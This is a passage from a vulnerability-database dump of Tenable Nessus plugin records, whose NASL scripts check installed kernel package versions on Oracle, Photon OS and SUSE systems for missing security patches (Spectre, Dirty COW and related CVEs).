rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:35:52", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n\n - xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386890]\n\n - xen-blkback: move indirect req allocation out-of-line (Ankur Arora) \n\n - xen-blkback: pull nseg validation out in a function (Ankur Arora) \n\n - xen-blkback: make struct pending_req less monolithic (Ankur Arora) \n\n - x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) \n\n - Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27403317]\n\n - sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) \n\n - sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27403317]\n\n - KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) (CVE-2017-5753)\n\n - KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27402301] (CVE-2017-1000407) (CVE-2017-1000407)\n\n - xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: 27397568]\n\n - ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins)", "modified": "2018-07-24T00:00:00", "id": "ORACLEVM_OVMSA-2018-0012.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=106226", "published": "2018-01-22T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0012) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0012.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106226);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/07/24 18:56:12\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-5753\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0012) (Spectre)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'kernel.spec: Require the new microcode_ctl.'\n (Brian Maly)\n\n - xen-blkback: add pending_req allocation stats (Ankur\n Arora) [Orabug: 27386890]\n\n - xen-blkback: move indirect req allocation out-of-line\n (Ankur Arora) \n\n - xen-blkback: pull nseg validation out in a function\n (Ankur Arora) \n\n - xen-blkback: make struct pending_req less monolithic\n (Ankur Arora) \n\n - x86: Clean up IBRS functionality resident in common code\n (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86: Display correct settings for the SPECTRE_V2 bug\n (Kanth Ghatraju) \n\n - Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - x86/cpu: Implement CPU vulnerabilites sysfs functions\n (Thomas Gleixner) [Orabug: 27403317]\n\n - sysfs/cpu: Fix typos in vulnerability documentation\n (David Woodhouse) \n\n - sysfs/cpu: Add vulnerability folder (Thomas Gleixner)\n [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David\n Woodhouse) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - KVM: x86: Add memory barrier on vmcs field lookup\n (Andrew Honig) (CVE-2017-5753)\n\n - KVM: VMX: remove I/O port 0x80 bypass on Intel hosts\n (Andrew Honig) [Orabug: 27402301] (CVE-2017-1000407)\n (CVE-2017-1000407)\n\n - xfs: give all workqueues rescuer threads (Chris Mason)\n [Orabug: 27397568]\n\n - ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao\n Martins)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-January/000822.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?026e66b2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-08T12:51:53", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2017-1_0-0095_LINUX.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121786", "title": "Photon OS 1.0: Linux PHSA-2017-1.0-0095", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-1.0-0095. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121786);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-12190\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-1.0-0095\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-95.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8818\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.106-1.ph1.noarch\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.106-1.ph1.noarch\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.106-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.106-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-08T12:51:52", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2017-1_0-0093_LINUX.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121780", "title": "Photon OS 1.0: Linux PHSA-2017-1.0-0093", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-1.0-0093. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121780);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-1.0-0093\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-93.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15088\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.104-1.ph1.noarch\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.104-1.ph1.noarch\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.104-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.104-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:34:15", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local attackers to corrupt memory of other processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-30T00:00:00", "id": "SUSE_SU-2017-3226-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105073", "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3226-1) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3226-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105073);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/11/30 10:54:51\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3226-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173226-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2dddb1e4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-2007=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-2007=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-2007=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n 